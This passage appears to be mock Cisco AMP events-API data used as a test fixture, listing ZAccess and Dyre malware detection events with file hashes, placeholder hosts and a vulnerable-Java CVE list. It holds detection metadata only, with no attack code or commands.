Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182417","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149717","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149716","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182419","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":923000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182418","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":740000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182415","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":717000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182414","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182412","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":606000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182410","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":583000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182409","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182408","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":16000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182406","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900400000800,"timestamp":1610705109,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:05:09+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.ZAccess.15nt","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705109,"start_date":"2021-01-15T10:05:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"disposition":"Clean","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255854610743000,"timestamp":1610705106,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:05:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255854610743321","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899799000300,"timestamp":1610705105,"timestamp_nanoseconds":799000000,"date":"2021-01-15T10:05:05+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705105,"start_date":"2021-01-15T10:05:05+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}},"vulnerabilities":[{"name":"Oracle Java(TM) Platform SE","version":"1.7.0:update_10","cve":"CVE-2013-5830","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5830"},{"cve":"CVE-2013-5843","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5843"},{"cve":"CVE-2013-5842","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5842"},{"cve":"CVE-2013-5817","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5817"},{"cve":"CVE-2013-5814","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5814"},{"cve":"CVE-2013-5809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5809"},{"cve":"CVE-2013-5789","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5789"},{"cve":"CVE-2013-5829","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5829"},{"cve":"CVE-2013-5788","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5788"},{"cve":"CVE-2013-5824","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5824"},{"cve":"CVE-2013-5787","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5787"},{"cv
e":"CVE-2013-5782","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5782"},{"cve":"CVE-2013-2470","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2470"},{"cve":"CVE-2013-2465","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2465"},{"cve":"CVE-2013-2471","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2471"},{"cve":"CVE-2013-2473","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2473"},{"cve":"CVE-2013-2472","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2472"},{"cve":"CVE-2013-2469","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2469"},{"cve":"CVE-2013-2468","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2468"},{"cve":"CVE-2013-2466","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2466"},{"cve":"CVE-2013-2464","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2464"},{"cve":"CVE-2013-2463","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2463"},{"cve":"CVE-2013-2459","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2459"},{"cve":"CVE-2013-2428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2428"},{"cve":"CVE-2013-2420","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2420"},{"cve":"CVE-2013-2434","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2434"},{"cve":"CVE-2013-2384","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2384"},{"cve":"CVE-2013-1518","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1518"},{"cve":"CVE-2013-1537","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vu